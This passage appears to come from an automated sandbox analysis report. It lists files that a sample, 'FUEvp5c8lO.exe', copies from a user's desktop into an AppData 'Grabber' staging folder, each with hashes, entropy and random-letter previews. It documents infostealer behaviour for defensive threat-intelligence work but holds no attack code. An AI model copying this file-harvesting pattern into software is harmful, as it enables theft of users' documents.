Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW\AFWAAFRXKO.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW\AIXACVYBSB.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW\PSAMNLJHZW.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW\ZSSZYEFYMU.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QVTVNIBKSD.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
Malicious:	false
Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QVTVNIBKSD\AFWAAFRXKO.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QVTVNIBKSD\MNULNCRIYC.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
